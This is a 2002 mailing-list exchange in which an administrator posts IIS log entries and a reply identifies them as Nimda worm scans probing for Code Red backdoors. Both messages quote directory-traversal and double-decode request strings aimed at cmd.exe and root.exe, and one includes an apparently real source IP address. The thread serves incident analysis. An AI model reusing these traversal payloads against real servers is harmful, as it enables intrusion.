Hello Jim, these traces look like a worm called nimda which appeared last year.
Here is a sample trace: 2001-09-19 00:00:00 x.x.x.x y.y.y.y GET /scripts/root.exe 404 820 72 80 HTTP/1.0 - - 2001-09-19 00:00:00 x.x.x.x y.y.y.y GET /MSADC/root.exe 404 820 70 80 HTTP/1.0 - - 2001-09-19 00:00:00 x.x.x.x y.y.y.y GET /c/winnt/system32/cmd.exe 404 820 80 80 HTTP/1.0 - - 2001-09-19 00:00:00 x.x.x.x y.y.y.y GET /d/winnt/system32/cmd.exe 404 820 80 80 HTTP/1.0 - - 2001-09-19 00:00:00 x.x.x.x y.y.y.y GET /scripts/..%5c../winnt/system32/cmd.exe 404 820 96 80 HTTP/1.0 - - 2001-09-19 00:00:00 x.x.x.x y.y.y.y GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404 820 117 80 HTTP/1.0 - - 2001-09-19 00:00:00 x.x.x.x y.y.y.y GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404 820 117 80 HTTP/1.0 - - 2001-09-19 00:00:00 x.x.x.x y.y.y.y GET /msadc/..%5c../..%5c../..%5c/..Á ../..Á ../..Á ../winnt/system32/cmd.exe 404 820 145 80 HTTP/1.0 - - 2001-09-19 00:00:00 x.x.x.x y.y.y.y GET /scripts/..Á ../winnt/system32/cmd.exe 404 820 97 80 HTTP/1.0 - - 2001-09-19 00:00:00 x.x.x.x y.y.y.y GET /scripts/winnt/system32/cmd.exe 404 820 97 80 HTTP/1.0 - - 2001-09-19 00:00:00 x.x.x.x y.y.y.y GET /winnt/system32/cmd.exe 404 820 97 80 HTTP/1.0 - - 2001-09-19 00:00:00 x.x.x.x y.y.y.y GET /winnt/system32/cmd.exe 404 820 97 80 HTTP/1.0 - - 2001-09-19 00:00:00 x.x.x.x y.y.y.y GET /scripts/..%5c../winnt/system32/cmd.exe 404 820 98 80 HTTP/1.0 - - 2001-09-19 00:00:00 x.x.x.x y.y.y.y GET /scripts/..%5c../winnt/system32/cmd.exe 404 820 96 80 HTTP/1.0 - - 2001-09-19 00:00:00 x.x.x.x y.y.y.y GET /scripts/..%5c../winnt/system32/cmd.exe 404 820 100 80 HTTP/1.0 - - 2001-09-19 00:00:00 x.x.x.x y.y.y.y GET /scripts/..%2f../winnt/system32/cmd.exe 404 820 96 80 HTTP/1.0 - - This is the whole trace of a nimda-scan. The Worm tried to find a backdoor placed earlier by another worm, called Code Red II or III I think. One final remark! Never post a trace like yours on an open list with original IP-Addresses in it, even if its not yours!!!! In this case, if its nimda, this machine is infected, and has probably still the vulnerability and backdoor on it. Better inform the owner of the machine and do not post the Ip-Address. Holger Reichert www.holysword.de [EMAIL PROTECTED] -----Ursprüngliche Nachricht----- Von: Jim Grossl [mailto:[EMAIL PROTECTED]] Gesendet: Dienstag, 15. Januar 2002 17:24 An: [EMAIL PROTECTED] Betreff: IIS log files, can I have your take on these attacks? 207.225.190.149 -- [14/Jan/2002:10:30:22 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 3396 207.225.190.149 -- [14/Jan/2002:10:30:22 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 3396 207.225.190.149 -- [14/Jan/2002:10:30:22 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396 207.225.190.149 -- [14/Jan/2002:10:30:22 -0700] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396 207.225.190.149 -- [14/Jan/2002:10:30:23 -0700] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 3837 207.225.190.149 - - [14/Jan/2002:10:30:25 -0700] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396 I kind of bothers me to post these on an open list (apparently our Web server doesn't need any more "attention") but I would like to know what everyone thinks of these attacks. My Web server logged > 2000 of these attacks over the weekend. I'm pretty sure that attacks are not succeeding, but I've read that if the "%5c" shows up in the Double Decode attack that the file traversal is taking place. Thanks. Jim Grossl
